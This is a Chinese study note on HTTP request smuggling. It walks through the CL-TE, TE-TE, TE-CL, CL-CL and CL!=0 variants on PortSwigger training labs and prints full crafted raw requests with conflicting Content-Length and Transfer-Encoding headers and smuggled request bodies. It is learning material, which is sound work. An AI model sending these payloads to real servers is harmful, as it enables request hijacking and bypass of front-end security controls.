http走私漏洞学习(1)--http走私简介
http走私漏洞学习(2)--http走私常见方法
http走私漏洞学习(3)--http走私漏洞利用
0x00 CL-TE
CL-TE,是指前端遵循Content-Length请求头,而后端遵循RFC2616规定,忽略Content-Length请求头,而去处理Transfer-Encoding请求头。
实验靶场:https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
进入靶场抓包,修改为POST请求方式,关闭burp suite自动更新Content-Length功能
修改数据包,添加 Transfer-Encoding: chunked,修改数据包Content-Length的值
接着提交,返回正常POST / HTTP/1.1 Host: ac281f8a1ece4f1980d61fb7000a00d0.web-security-academy.net Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: session=E4Rwvo7mdvUM2W9694zcELGHntk1EJGk Content-Type: application/x-www-form-urlencoded Content-Length: 10 Transfer-Encoding: chunked 0 HELLO
再次提交,提示:"Unrecognized method HELLOPOST"
发现HELLO成为了走私数据拼接到了另一个数据包,数据包变成了HELLOPOST / HTTP/1.1 ....
0x01 TE-CL
TE-CL,当前端处理Transfer-Encoding请求头,而后端处理Content-Length产生。前端读取至0\r\n\r\n,后端读取Content-Length长度,后续数据被认为是下一个请求。
实验靶场:https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
提交数据包如下:提交一次该数据包后,再提交正常数据包,提示‘Unrecognized method GPOST’POST / HTTP/1.1 Host: ac9f1f681f95468d8013337c004200de.web-security-academy.net Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Cookie: session=kAEmhKyFvWinLjDltGl7olFUN0EE6ZBp Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
0x02 TE-TE
TE-TE,数据包存在两个Transfer-Encoding,当前端服务器处理第一个TE,而后端服务器处理第二个Transfer-Encoding,造成走私。
实验靶场:https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
提交数据包如下提交一次该数据包后,再提交正常数据包,提示‘Unrecognized method GPOST’POST / HTTP/1.1 Host: accc1f301e16349d8090a8f30091009b.web-security-academy.net Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: session=oWRjwBUx5SdT8KI9EiUUgiM4b8bBBSdK Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
0x03 CL-CL
CL-CL,根据RFC7230的规范中,服务器接收两个Content-Length且两者值不同时,需要返回400错误。如果服务器不遵守规范,前端服务器读取第一个CL,而后端服务器读取了第二个CL,便造成了走私。
如:POST / HTTP/1.1 Host: xxx.com Content-Length:5 Content-Length:4 hello余下的‘o’为被当成正常请求,将被拼接到下一个请求中
CL!=0
CL不为0,当前端服务器允许GET请求携带请求体,而后端服务器不允许携带请求体,后端会忽略掉GET请求中的Content-Length头,可能会导致请求走私。
GET / HTTP/1.1 Host: xxx.com Content-Length: 33 GET / HTTP/1.1 Host: xxx.com由于Pipeline存在,后端服务器忽略了CL后,可能会认为受到了两个数据包。
